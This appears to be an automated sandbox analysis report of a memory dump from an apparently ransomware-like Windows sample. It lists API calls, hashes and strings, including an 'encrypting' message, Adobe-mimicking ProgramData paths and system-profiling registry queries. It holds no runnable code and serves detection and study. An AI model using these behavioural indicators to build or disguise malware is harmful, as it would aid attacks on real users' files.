
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 241762eb00cea3b4e15cc9c0d3c2e59860daba6cf3e0e78a5ffb0fc5932b8058
                                                                    • Instruction ID: dcbecea466f49374d633027985f8816ba3b03778601b0ef9f70c122d95f97203
                                                                    • Opcode Fuzzy Hash: 241762eb00cea3b4e15cc9c0d3c2e59860daba6cf3e0e78a5ffb0fc5932b8058
                                                                    • Instruction Fuzzy Hash: 02417271A006198FCB58CF79C592AAABBF1FF4C31075681AAD81AEB215D730E940CF94
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9f5fd682f38fb1484a9eb3efe9b9390519736aa7ba496949638d3376f2dc5740
                                                                    • Instruction ID: d810c7b4711651d075c9965adf5fe79c1ab6a44c9ec7b9fa924fa0e1679d6662
                                                                    • Opcode Fuzzy Hash: 9f5fd682f38fb1484a9eb3efe9b9390519736aa7ba496949638d3376f2dc5740
                                                                    • Instruction Fuzzy Hash: D811A723F30C255A675C81698C172BAA5D2DBD824031F533ED827E7284E994DE13D290
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                    • Instruction ID: c1ff17ab45dd971813a33037e3e10e047e25a9257b01e91a7171ee78584e6f56
                                                                    • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                    • Instruction Fuzzy Hash: B5110B7720038243D60C862DD4BC6B7A395EBCF32972DA27AD0426F658D326B947D502
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f00f91ec60cc13c50289529e760e8c9e34618cd32daee79e4480007b99b0a29d
                                                                    • Instruction ID: a67b038779dc793ef26ed2ffff39733afc560a1d0b1e99a4566a1f68819d3972
                                                                    • Opcode Fuzzy Hash: f00f91ec60cc13c50289529e760e8c9e34618cd32daee79e4480007b99b0a29d
                                                                    • Instruction Fuzzy Hash: 051125766406408FC728CF18FD45B2AF7E4EB45764F149B3EE452D7780DB34A8408B40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 65cd9515a9a94a842fd49909436e2da0a92580843f5e643611ebf4085796f379
                                                                    • Instruction ID: 516016cd6bc0cbbff5d6a11fa3b3e1b8c40c570c3f2db51ba643ea4a491a34c8
                                                                    • Opcode Fuzzy Hash: 65cd9515a9a94a842fd49909436e2da0a92580843f5e643611ebf4085796f379
                                                                    • Instruction Fuzzy Hash: FAE08C32915228EBCB15DB98C944ACAF7FCEB84B50B5108A6F901F3600C270DE01DBD0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • CreateThread.KERNEL32 ref: 00E6C51F
                                                                    • CreateFileW.KERNEL32(?,00120089,00000003,00000000,00000003,00000080,00000000,\st.xpi), ref: 00E6C731
                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000048), ref: 00E6C745
                                                                    • ReadFile.KERNEL32(00000000,?,00000000,?,00000000,00000000,00000000), ref: 00E6C787
                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000048), ref: 00E6C814
                                                                    • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000048), ref: 00E6C877
                                                                    • WaitForSingleObject.KERNEL32(000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?,00000048), ref: 00E6C885
                                                                    • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00E6C8BC
                                                                    • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00E6C8F2
                                                                    • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00E6C928
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Create$DirectoryFile$CloseEventHandleObjectReadSingleSizeThreadWait
                                                                    • String ID: \ProgramData\Adobe$\ProgramData\Adobe\Extension Manager CC$\ProgramData\Adobe\Extension Manager CC\Logs\$\\?\c:$\programdata\dat$\st.xpi
                                                                    • API String ID: 1682410794-4014864706
                                                                    • Opcode ID: be50afd7d74e079c920b878f2d000ec5d5851376156ab908841562347347e9b0
                                                                    • Instruction ID: a22e7fff97aa40905093a8fef9ca33537572db4735bfc9e94b93224ff2605fcd
                                                                    • Opcode Fuzzy Hash: be50afd7d74e079c920b878f2d000ec5d5851376156ab908841562347347e9b0
                                                                    • Instruction Fuzzy Hash: ABD1BF71D44348DFDB20DFA4EC46BDDB7B4EB15304F2092A9E409B7292EB706A49CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • CreateFileW.KERNEL32(?,10000000,00000001,00000000,00000004,00000080,00000000,00ED9C6C,00000000,00000000), ref: 00E6864E
                                                                    • SetFilePointerEx.KERNEL32(00000000,00F2C310,00000002), ref: 00E68686
                                                                    • WriteFile.KERNEL32(00000000,?,?,00F2C2B8,00000000), ref: 00E686A7
                                                                    • FlushFileBuffers.KERNEL32(00000000,?,00F2C2B8,00000000), ref: 00E686AE
                                                                    • CloseHandle.KERNEL32(00000000,?,00F2C2B8,00000000), ref: 00E686B5
                                                                    • __Mtx_unlock.LIBCPMT ref: 00E68805
                                                                      • Part of subcall function 00EAEBD8: _free.LIBCMT ref: 00EAEBEB
                                                                    • GetLastError.KERNEL32 ref: 00E68713
                                                                    • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,000000FF,00000000,00000001,?,00000000,00000000), ref: 00E68852
                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00E6886F
                                                                    • SetEvent.KERNEL32(?,?,00000000,00000000), ref: 00E68877
                                                                    • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,000000FF,?,00000000,00000000), ref: 00E68884
                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,00000000), ref: 00E68891
                                                                    • CloseHandle.KERNEL32(?,?,00000000,00000000), ref: 00E68899
                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,00000000), ref: 00E688A1
                                                                    Strings
                                                                    • Invaild Handle in log saving , xrefs: 00E68730
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: File$CloseHandle$MultipleObjectsWait$BuffersCreateErrorEventFlushLastMtx_unlockPointerReadWrite_free
                                                                    • String ID: Invaild Handle in log saving
                                                                    • API String ID: 636126068-1891806280
                                                                    • Opcode ID: 6e9bd088d9436deda9c09e2dfb169c9979a134c5d1c5677925eca444ffe94d73
                                                                    • Instruction ID: 5cc1122fff3d242e9b047722284ec7ec6d64d8298c3705eac27c707573061e0d
                                                                    • Opcode Fuzzy Hash: 6e9bd088d9436deda9c09e2dfb169c9979a134c5d1c5677925eca444ffe94d73
                                                                    • Instruction Fuzzy Hash: CFD1AB71901248DFDB10DFA8DD49BDEBBB0FF09304F144269E405BB2A2DB75AA09CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • _free.LIBCMT ref: 00EBDE6B
                                                                      • Part of subcall function 00EB5945: RtlFreeHeap.NTDLL(00000000,00000000,?,00EBE5A9,00E64835,00000000,00E64835,00E64837,?,00EBE84C,00E64835,00000007,00E64835,?,00EBECFA,00E64835), ref: 00EB595B
                                                                      • Part of subcall function 00EB5945: GetLastError.KERNEL32(00E64835,?,00EBE5A9,00E64835,00000000,00E64835,00E64837,?,00EBE84C,00E64835,00000007,00E64835,?,00EBECFA,00E64835,00E64835), ref: 00EB596D
                                                                    • _free.LIBCMT ref: 00EBDE7D
                                                                    • _free.LIBCMT ref: 00EBDE8F
                                                                    • _free.LIBCMT ref: 00EBDEA1
                                                                    • _free.LIBCMT ref: 00EBDEB3
                                                                    • _free.LIBCMT ref: 00EBDEC5
                                                                    • _free.LIBCMT ref: 00EBDED7
                                                                    • _free.LIBCMT ref: 00EBDEE9
                                                                    • _free.LIBCMT ref: 00EBDEFB
                                                                    • _free.LIBCMT ref: 00EBDF0D
                                                                    • _free.LIBCMT ref: 00EBDF1F
                                                                    • _free.LIBCMT ref: 00EBDF31
                                                                    • _free.LIBCMT ref: 00EBDF43
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: 0c1642d13888bb913d07b0ed2ab54573534db775e60410117ecabfb1f66219cc
                                                                    • Instruction ID: 069eea709c499667e3f1c057061acb67776676cfd262f58ec44523a4f557760c
                                                                    • Opcode Fuzzy Hash: 0c1642d13888bb913d07b0ed2ab54573534db775e60410117ecabfb1f66219cc
                                                                    • Instruction Fuzzy Hash: 68212D33509A88EFC670EBA5E8C5DA733F9AB813307642809F055FB561D631FC844A10
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • _free.LIBCMT ref: 00EBEB9C
                                                                      • Part of subcall function 00EB5945: RtlFreeHeap.NTDLL(00000000,00000000,?,00EBE5A9,00E64835,00000000,00E64835,00E64837,?,00EBE84C,00E64835,00000007,00E64835,?,00EBECFA,00E64835), ref: 00EB595B
                                                                      • Part of subcall function 00EB5945: GetLastError.KERNEL32(00E64835,?,00EBE5A9,00E64835,00000000,00E64835,00E64837,?,00EBE84C,00E64835,00000007,00E64835,?,00EBECFA,00E64835,00E64835), ref: 00EB596D
                                                                      • Part of subcall function 00EBDE4E: _free.LIBCMT ref: 00EBDE6B
                                                                      • Part of subcall function 00EBDE4E: _free.LIBCMT ref: 00EBDE7D
                                                                      • Part of subcall function 00EBDE4E: _free.LIBCMT ref: 00EBDE8F
                                                                      • Part of subcall function 00EBDE4E: _free.LIBCMT ref: 00EBDEA1
                                                                      • Part of subcall function 00EBDE4E: _free.LIBCMT ref: 00EBDEB3
                                                                      • Part of subcall function 00EBDE4E: _free.LIBCMT ref: 00EBDEC5
                                                                      • Part of subcall function 00EBDE4E: _free.LIBCMT ref: 00EBDED7
                                                                      • Part of subcall function 00EBDE4E: _free.LIBCMT ref: 00EBDEE9
                                                                      • Part of subcall function 00EBDE4E: _free.LIBCMT ref: 00EBDEFB
                                                                      • Part of subcall function 00EBDE4E: _free.LIBCMT ref: 00EBDF0D
                                                                      • Part of subcall function 00EBDE4E: _free.LIBCMT ref: 00EBDF1F
                                                                      • Part of subcall function 00EBDE4E: _free.LIBCMT ref: 00EBDF31
                                                                      • Part of subcall function 00EBDE4E: _free.LIBCMT ref: 00EBDF43
                                                                    • _free.LIBCMT ref: 00EBEBBE
                                                                    • _free.LIBCMT ref: 00EBEBD3
                                                                    • _free.LIBCMT ref: 00EBEBDE
                                                                    • _free.LIBCMT ref: 00EBEC00
                                                                    • _free.LIBCMT ref: 00EBEC13
                                                                    • _free.LIBCMT ref: 00EBEC21
                                                                    • _free.LIBCMT ref: 00EBEC2C
                                                                    • _free.LIBCMT ref: 00EBEC64
                                                                    • _free.LIBCMT ref: 00EBEC6B
                                                                    • _free.LIBCMT ref: 00EBEC88
                                                                    • _free.LIBCMT ref: 00EBECA0
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: 4464b62a7d2080d166f44a15fac26751469e8693656a544b036d745ad72dabfc
                                                                    • Instruction ID: 9cccbc79d5801e26be5ccde4fcbe271c2dfbe35f8830500430e7fcec926b9a8f
                                                                    • Opcode Fuzzy Hash: 4464b62a7d2080d166f44a15fac26751469e8693656a544b036d745ad72dabfc
                                                                    • Instruction Fuzzy Hash: 57313932604644DFEB71AB79D945BE7B7E9AF81324F146829E065F6261DF30EC80CB10
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    • will stop encrypting and exit , xrefs: 00EA5BFF
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CurrentThread$_xtime_get$Xtime_diff_to_millis2
                                                                    • String ID: will stop encrypting and exit
                                                                    • API String ID: 3943753294-1730389960
                                                                    • Opcode ID: 18b626e4fa8bed6145b65e7cf69075ed859f8a681e6628817046ccc64ef0e71c
                                                                    • Instruction ID: f8e40d6fe370baee2e439c07ed0590b3d802a852fa1c17f6f773e112e83f51b3
                                                                    • Opcode Fuzzy Hash: 18b626e4fa8bed6145b65e7cf69075ed859f8a681e6628817046ccc64ef0e71c
                                                                    • Instruction Fuzzy Hash: 43518C32900A05CFCF10DF64C9859A9B7B4EF0E724B25A4AAE806BF295D731FD45CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                      • Part of subcall function 00E893E0: RegOpenKeyExA.ADVAPI32(80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,00000000,00000001,?), ref: 00E89474
                                                                    • GlobalMemoryStatusEx.KERNEL32(00000040,A6ABE2D4,00000000,00000000), ref: 00E8989B
                                                                    • GetCurrentProcess.KERNEL32(?,00000017), ref: 00E89A6B
                                                                    • IsWow64Process.KERNEL32(00000000), ref: 00E89A72
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Process$CurrentGlobalMemoryOpenStatusWow64
                                                                    • String ID: board:$GB ,FREE Physical Memory : $Total Physical Memory :$X64$X86
                                                                    • API String ID: 1246137313-800217443
                                                                    • Opcode ID: 0e254909cdae4f1b9c05ffd7f7df4113cce320254400c748f7719c6218f13e8b
                                                                    • Instruction ID: b706f653a96dfdb49d76a282a0b5858d011b8312721ff4daedd515fc3566dc31
                                                                    • Opcode Fuzzy Hash: 0e254909cdae4f1b9c05ffd7f7df4113cce320254400c748f7719c6218f13e8b
                                                                    • Instruction Fuzzy Hash: 10326970C012A9DEEB25EF64C958BDEBBB4AF15304F1042D9D4487B292DBB45B88CF91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                      • Part of subcall function 00EBE57F: _free.LIBCMT ref: 00EBE5A4
                                                                    • _free.LIBCMT ref: 00EBE881
                                                                      • Part of subcall function 00EB5945: RtlFreeHeap.NTDLL(00000000,00000000,?,00EBE5A9,00E64835,00000000,00E64835,00E64837,?,00EBE84C,00E64835,00000007,00E64835,?,00EBECFA,00E64835), ref: 00EB595B
                                                                      • Part of subcall function 00EB5945: GetLastError.KERNEL32(00E64835,?,00EBE5A9,00E64835,00000000,00E64835,00E64837,?,00EBE84C,00E64835,00000007,00E64835,?,00EBECFA,00E64835,00E64835), ref: 00EB596D
                                                                    • _free.LIBCMT ref: 00EBE88C
                                                                    • _free.LIBCMT ref: 00EBE897
                                                                    • _free.LIBCMT ref: 00EBE8EB
                                                                    • _free.LIBCMT ref: 00EBE8F6
                                                                    • _free.LIBCMT ref: 00EBE901
                                                                    • _free.LIBCMT ref: 00EBE90C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID: h}j
                                                                    • API String ID: 776569668-1955591510
                                                                    • Opcode ID: dbc8bfa29b19da58b5d7245c7bc32f2af07410bbec0ab13c0663d7cbf5f3f41a
                                                                    • Instruction ID: 81f2c74b6f6281d273a7ef4f20c15214529fa6e5d403238a70ff9235704a6fa4
                                                                    • Opcode Fuzzy Hash: dbc8bfa29b19da58b5d7245c7bc32f2af07410bbec0ab13c0663d7cbf5f3f41a
                                                                    • Instruction Fuzzy Hash: 43116A32941B04EAD670FBB0CC07FDB77DCBF41714F401814B2A9B62A2FA24A91496A0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00E81EB0
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00E81ED2
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00E81EFA
                                                                    • __Getctype.LIBCPMT ref: 00E81FC5
                                                                    • std::_Facet_Register.LIBCPMT ref: 00E82000
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00E82034
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                                                                    • String ID: "
                                                                    • API String ID: 1102183713-357034475
                                                                    • Opcode ID: 9965aa443d04d344ec771cb9b7347ce625caf9fc98164df2911c2576b9503951
                                                                    • Instruction ID: 0ec7fed09106a78eac4730e9bd36eac410f1239d075e9a35a8b3adde8d04325e
                                                                    • Opcode Fuzzy Hash: 9965aa443d04d344ec771cb9b7347ce625caf9fc98164df2911c2576b9503951
                                                                    • Instruction Fuzzy Hash: 5751BAB0D00248DFDB11DF98C941BAEBBF8FF45314F244199D819BB291EB75AA06CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • _ValidateLocalCookies.LIBCMT ref: 00EAA927
                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 00EAA92F
                                                                    • _ValidateLocalCookies.LIBCMT ref: 00EAA9B8
                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00EAA9E3
                                                                    • _ValidateLocalCookies.LIBCMT ref: 00EAAA38
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                    • String ID: csm
                                                                    • API String ID: 1170836740-1018135373
                                                                    • Opcode ID: 1b103a480db891dd59d735ae8b1b7ddc05a3b49b3983a6d9107b0219441b0484
                                                                    • Instruction ID: bc0dabe71306915f6718091abd8bd64f6c16383b6caaa208c422ec2eb3f7aa8b
                                                                    • Opcode Fuzzy Hash: 1b103a480db891dd59d735ae8b1b7ddc05a3b49b3983a6d9107b0219441b0484
                                                                    • Instruction Fuzzy Hash: 1651B634A003499FCF10DF68D881AAE7BF5AF4A318F199165E8197F352D732B905CB92
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • RegOpenKeyExA.ADVAPI32(80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,00000000,00000001,?), ref: 00E89474
                                                                    • RegQueryValueExA.ADVAPI32(?,ProcessorNameString,00000000,00000001,00000000,00000000), ref: 00E894C8
                                                                    • RegQueryValueExA.ADVAPI32(?,ProcessorNameString,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00E89517
                                                                    • RegCloseKey.ADVAPI32(?), ref: 00E89570
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: QueryValue$CloseOpen
                                                                    • String ID: HARDWARE\DESCRIPTION\System\CentralProcessor\0$ProcessorNameString
                                                                    • API String ID: 1586453840-2804670039
                                                                    • Opcode ID: 7f8edd03703296efad95db6d37866a4df716df54eda18a08bcad590dd482251b
